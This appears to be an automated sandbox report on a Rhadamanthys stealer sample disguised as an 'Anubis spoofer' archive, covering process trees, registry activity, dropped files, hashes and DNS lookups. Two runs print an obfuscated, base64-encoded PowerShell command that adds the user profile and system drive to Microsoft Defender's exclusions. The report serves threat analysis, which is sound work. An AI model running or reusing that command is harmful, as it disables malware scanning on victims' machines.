Malware Analysis Report

2024-11-15 06:03

Sample ID 240928-lyq4gszbkp
Target anubisspoofer.rar
SHA256 939cdd940184fa0be3ac8de9330d66e144d93396098713278e736e6ab1396f72
Tags
rhadamanthys defense_evasion discovery stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

939cdd940184fa0be3ac8de9330d66e144d93396098713278e736e6ab1396f72

Threat Level: Known bad

The file anubisspoofer.rar was found to be: Known bad.

Malicious Activity Summary

rhadamanthys defense_evasion discovery stealer

Detect rhadamanthys stealer shellcode

Rhadamanthys

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Obfuscated Files or Information: Command Obfuscation

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: GetForegroundWindowSpam

Checks SCSI registry key(s)

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-28 09:56

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-28 09:56

Reported

2024-09-28 09:59

Platform

win7-20240903-en

Max time kernel

146s

Max time network

120s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar

C:\Program Files\VideoLAN\VLC\vlc.exe

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar"

Network

N/A

Files

memory/2900-31-0x000000013F960000-0x000000013FA58000-memory.dmp

memory/2900-32-0x000007FEFA7B0000-0x000007FEFA7E4000-memory.dmp

memory/2900-34-0x000007FEFAA70000-0x000007FEFAA88000-memory.dmp

memory/2900-40-0x000007FEF5860000-0x000007FEF5871000-memory.dmp

memory/2900-39-0x000007FEF5880000-0x000007FEF589D000-memory.dmp

memory/2900-38-0x000007FEF58A0000-0x000007FEF58B1000-memory.dmp

memory/2900-37-0x000007FEF6B00000-0x000007FEF6B17000-memory.dmp

memory/2900-36-0x000007FEF6B20000-0x000007FEF6B31000-memory.dmp

memory/2900-35-0x000007FEFA790000-0x000007FEFA7A7000-memory.dmp

memory/2900-33-0x000007FEF59F0000-0x000007FEF5CA6000-memory.dmp

memory/2900-41-0x000007FEF5650000-0x000007FEF585B000-memory.dmp

memory/2900-49-0x000007FEF4480000-0x000007FEF449B000-memory.dmp

memory/2900-48-0x000007FEF44A0000-0x000007FEF44B1000-memory.dmp

memory/2900-47-0x000007FEF44C0000-0x000007FEF44D1000-memory.dmp

memory/2900-46-0x000007FEF44E0000-0x000007FEF44F1000-memory.dmp

memory/2900-45-0x000007FEF4500000-0x000007FEF4518000-memory.dmp

memory/2900-44-0x000007FEF4520000-0x000007FEF4541000-memory.dmp

memory/2900-43-0x000007FEF4550000-0x000007FEF4591000-memory.dmp

memory/2900-51-0x000007FEF4440000-0x000007FEF4458000-memory.dmp

memory/2900-53-0x000007FEF43A0000-0x000007FEF4407000-memory.dmp

memory/2900-61-0x000007FEF41D0000-0x000007FEF41E1000-memory.dmp

memory/2900-62-0x000007FEF41B0000-0x000007FEF41C2000-memory.dmp

memory/2900-60-0x000007FEF41F0000-0x000007FEF4213000-memory.dmp

memory/2900-56-0x000007FEF42A0000-0x000007FEF42F7000-memory.dmp

memory/2900-59-0x000007FEF4220000-0x000007FEF4238000-memory.dmp

memory/2900-58-0x000007FEF4240000-0x000007FEF4264000-memory.dmp

memory/2900-57-0x000007FEF4270000-0x000007FEF4298000-memory.dmp

memory/2900-55-0x000007FEF4300000-0x000007FEF4311000-memory.dmp

memory/2900-52-0x000007FEF4410000-0x000007FEF4440000-memory.dmp

memory/2900-54-0x000007FEF4320000-0x000007FEF439C000-memory.dmp

memory/2900-42-0x000007FEF45A0000-0x000007FEF5650000-memory.dmp

memory/2900-50-0x000007FEF4460000-0x000007FEF4471000-memory.dmp

memory/2900-63-0x000007FEF31B0000-0x000007FEF3330000-memory.dmp

memory/2900-64-0x000007FEF7FB0000-0x000007FEF7FC7000-memory.dmp

memory/2900-65-0x000007FEFAFE0000-0x000007FEFAFF0000-memory.dmp

memory/2900-66-0x000007FEF7F80000-0x000007FEF7FAF000-memory.dmp

memory/2900-67-0x000007FEF7F60000-0x000007FEF7F71000-memory.dmp

memory/2900-68-0x000007FEF7F40000-0x000007FEF7F56000-memory.dmp

memory/2900-69-0x000007FEF30E0000-0x000007FEF31A5000-memory.dmp

memory/2900-70-0x000007FEF3090000-0x000007FEF30D2000-memory.dmp

memory/2900-71-0x000007FEF2E20000-0x000007FEF2E82000-memory.dmp

memory/2900-72-0x000007FEF3020000-0x000007FEF308D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-28 09:56

Reported

2024-09-28 09:59

Platform

win10v2004-20240802-en

Max time kernel

93s

Max time network

95s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-09-28 09:56

Reported

2024-09-28 09:59

Platform

win7-20240903-en

Max time kernel

14s

Max time network

18s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Anubis.exe"

Signatures

Detect rhadamanthys stealer shellcode

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Rhadamanthys

stealer rhadamanthys

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Anubis.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2752 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2752 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2752 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2752 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2752 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Users\Admin\AppData\Local\Temp\Launcher.exe
PID 2752 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Users\Admin\AppData\Local\Temp\Launcher.exe
PID 2752 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Users\Admin\AppData\Local\Temp\Launcher.exe
PID 2752 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Users\Admin\AppData\Local\Temp\Launcher.exe
PID 2752 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
PID 2752 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
PID 2752 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
PID 2752 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\Anubis.exe C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
PID 2420 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\system32\cmd.exe
PID 2420 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\system32\cmd.exe
PID 2420 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Anubis.exe

"C:\Users\Admin\AppData\Local\Temp\Anubis.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdgBuACMAPgA="

C:\Users\Admin\AppData\Local\Temp\Launcher.exe

"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"

C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe

"C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c pause

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\Launcher.exe

MD5 a8db312e9364d1d82600bf5a398212fe
SHA1 3bbacada2b463bb9f62ed7ae34a8e8440bc91dcb
SHA256 84e01afa9f1f134caa4e49456f4a1700e17bae4cbd962c1dfdf6cdfd61b3a3cb
SHA512 a7994ab1901aa1fc6ee89a302a92c9ec7fc3febc348a21e0445d4e17bb2c736ef563543dde94a01fe5d81094e792b354db1d02f8069992b36791fdbb0f8a5782

\Users\Admin\AppData\Local\Temp\WindowsHost.exe

MD5 515a0c8be21a5ba836e5687fc2d73333
SHA1 c52be9d0d37ac1b8d6bc09860e68e9e0615255ab
SHA256 9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae
SHA512 4e2bd7ce844bba25aff12e2607c4281b59f7579b9407139ef6136ef09282c7afac1c702adebc42f8bd7703fac047fd8b5add34df334bfc04d3518ea483225522

memory/2932-17-0x0000000000230000-0x0000000000237000-memory.dmp

memory/2932-18-0x0000000001F80000-0x0000000002380000-memory.dmp

memory/2932-19-0x0000000001F80000-0x0000000002380000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-09-28 09:56

Reported

2024-09-28 09:57

Platform

win10v2004-20240802-en

Max time kernel

20s

Max time network

22s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Anubis.exe"

Signatures

Detect rhadamanthys stealer shellcode

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Rhadamanthys

stealer rhadamanthys

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Anubis.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Anubis.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Anubis.exe

"C:\Users\Admin\AppData\Local\Temp\Anubis.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdgBuACMAPgA="

C:\Users\Admin\AppData\Local\Temp\Launcher.exe

"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"

C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe

"C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c pause

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Launcher.exe

MD5 a8db312e9364d1d82600bf5a398212fe
SHA1 3bbacada2b463bb9f62ed7ae34a8e8440bc91dcb
SHA256 84e01afa9f1f134caa4e49456f4a1700e17bae4cbd962c1dfdf6cdfd61b3a3cb
SHA512 a7994ab1901aa1fc6ee89a302a92c9ec7fc3febc348a21e0445d4e17bb2c736ef563543dde94a01fe5d81094e792b354db1d02f8069992b36791fdbb0f8a5782

C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe

MD5 515a0c8be21a5ba836e5687fc2d73333
SHA1 c52be9d0d37ac1b8d6bc09860e68e9e0615255ab
SHA256 9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae
SHA512 4e2bd7ce844bba25aff12e2607c4281b59f7579b9407139ef6136ef09282c7afac1c702adebc42f8bd7703fac047fd8b5add34df334bfc04d3518ea483225522

memory/2716-16-0x000000007422E000-0x000000007422F000-memory.dmp

memory/2716-17-0x0000000004C60000-0x0000000004C96000-memory.dmp

memory/2716-18-0x0000000074220000-0x00000000749D0000-memory.dmp

memory/2716-19-0x0000000005350000-0x0000000005978000-memory.dmp

memory/2716-20-0x0000000074220000-0x00000000749D0000-memory.dmp

memory/2716-21-0x0000000005270000-0x0000000005292000-memory.dmp

memory/2716-23-0x0000000005BE0000-0x0000000005C46000-memory.dmp

memory/2716-22-0x0000000005B70000-0x0000000005BD6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s5dae4za.q2s.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2716-33-0x0000000005C50000-0x0000000005FA4000-memory.dmp

memory/2716-34-0x0000000006240000-0x000000000625E000-memory.dmp

memory/2716-35-0x0000000006260000-0x00000000062AC000-memory.dmp

memory/2716-36-0x0000000006810000-0x0000000006842000-memory.dmp

memory/2716-37-0x0000000073DE0000-0x0000000073E2C000-memory.dmp

memory/2716-47-0x00000000067D0000-0x00000000067EE000-memory.dmp

memory/2716-48-0x0000000007290000-0x0000000007333000-memory.dmp

memory/2716-49-0x0000000007BC0000-0x000000000823A000-memory.dmp

memory/2716-50-0x0000000007560000-0x000000000757A000-memory.dmp

memory/3584-51-0x00000000021B0000-0x00000000021B7000-memory.dmp

memory/3584-52-0x00000000022A0000-0x00000000026A0000-memory.dmp

memory/3584-53-0x00000000022A0000-0x00000000026A0000-memory.dmp

memory/2716-54-0x00000000075D0000-0x00000000075DA000-memory.dmp

memory/2716-55-0x00000000077F0000-0x0000000007886000-memory.dmp

memory/2716-56-0x0000000007760000-0x0000000007771000-memory.dmp

memory/2716-57-0x00000000077A0000-0x00000000077AE000-memory.dmp

memory/2716-58-0x00000000077B0000-0x00000000077C4000-memory.dmp

memory/2716-59-0x0000000007890000-0x00000000078AA000-memory.dmp

memory/2716-60-0x00000000077E0000-0x00000000077E8000-memory.dmp

memory/2716-63-0x0000000074220000-0x00000000749D0000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-09-28 09:56

Reported

2024-09-28 09:59

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\spooferconfig.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1708 wrote to memory of 1444 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe
PID 1708 wrote to memory of 1444 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe
PID 1708 wrote to memory of 1444 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\spooferconfig.dll,#1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1708 -s 260

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-09-28 09:56

Reported

2024-09-28 09:59

Platform

win10v2004-20240802-en

Max time kernel

93s

Max time network

95s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\spooferconfig.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\spooferconfig.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A